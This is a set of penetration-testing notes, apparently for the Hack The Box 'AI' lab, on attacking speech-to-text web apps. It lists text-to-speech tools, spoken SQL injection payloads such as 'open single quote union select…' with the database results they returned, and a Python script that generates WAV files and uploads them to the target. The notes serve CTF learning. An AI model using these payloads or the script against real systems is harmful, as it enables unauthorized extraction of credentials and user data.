AI
Sample PHP Pseudo Code #
$voice = new play('file.wav');
$result = $voice->recognise("Good Morning");
if ($result) {
echo "Matched Good Morning";
//flag to database or csv
} else {
echo "No match found";
}
Attacks #
[Text-To-Speech speaks pwned Flanker Sky](https://blog.flanker017.me/text-to-speech-speaks-pwned/) - Alexa Can Be Hacked with SQL Injection to Give Away Private Info - IoT Tech Trends
Tools #
[Text to speech free online Text to mp3, Text to wav](https://www.texttospeechfree.com/) - Text 2 Speech - Includes more voices such as Male US, I used this in HTB Ai
- Flite - Command line equivalent of Text 2 Speech
# Generates WAV file from Male US voice
flite -voice rms "hello world" a.wav
- text2wav - similar to flite
echo "Hello open single quote" | text2wave -o ai.wav
Voice to SQL #
- GitHub - Shravankumarhiregoudar/Speech-to-SQL-Research-Paper
[Just Speak SQL ADA Lab Blog](https://adalabucsd.github.io/research-blog/research/2020/06/14/speakql.html)
Speech to SQL Queries and Payloads #
- From HTB AI:
- Windows Speech Recognition commands
- Some custom payloads from HTB AI (See python script below for reference):
# I didn't see any speech to text command for "select" in
# microsoft website but this works in this form.
# Result:
# <h3>Our understanding of your input is : 'union select 1 -- -<br />Query result : 1<h3>
./sqli.py "open single quote union select 1 comment database"
# Here, "select" and "password" was combined to "selectpassword"
# Result: H,Sq9t6}a<)?q93_
./sqli.py "open single quote union selectpassword from users comment database"
# Adding "space" to get username
# Result: <h3>Our understanding of your input is : 'union select username from users -- -<br />Query result : alexa<h3>
./sqli.py "open single quote union select space username from users comment database"
- From HTB AI official walkthrough
' union select password from users#
Python script to automate upload of WAV File #
#!/usr/bin/env python3
import requests
import os
import sys
import re
proxies = {'http': 'http://127.0.0.1:8080'}
url = 'http://ai/ai.php'
wav_filename = 'voice.wav'
voice_filename = 'voice.txt'
try:
query = sys.argv[1]
except IndexError:
print('Example Usage: ./sqli.py "Comment database"')
sys.exit(0)
def generate_wav(query):
with open(voice_filename, 'w') as f:
f.write(query)
os.system('flite -voice rms {} {}'.format(voice_filename, wav_filename))
def send_file():
data = {'wav_filename': wav_filename, 'name': 'Submit'}
files = {
'fileToUpload': (wav_filename, open(wav_filename, 'rb')),
'submit': (None, 'Process It!')
}
r = requests.post(url, files=files, proxies=proxies)
sql_response = re.findall('<h3>Our understanding.+<h3>', r.text)[0]
print(sql_response)
generate_wav(query)
send_file()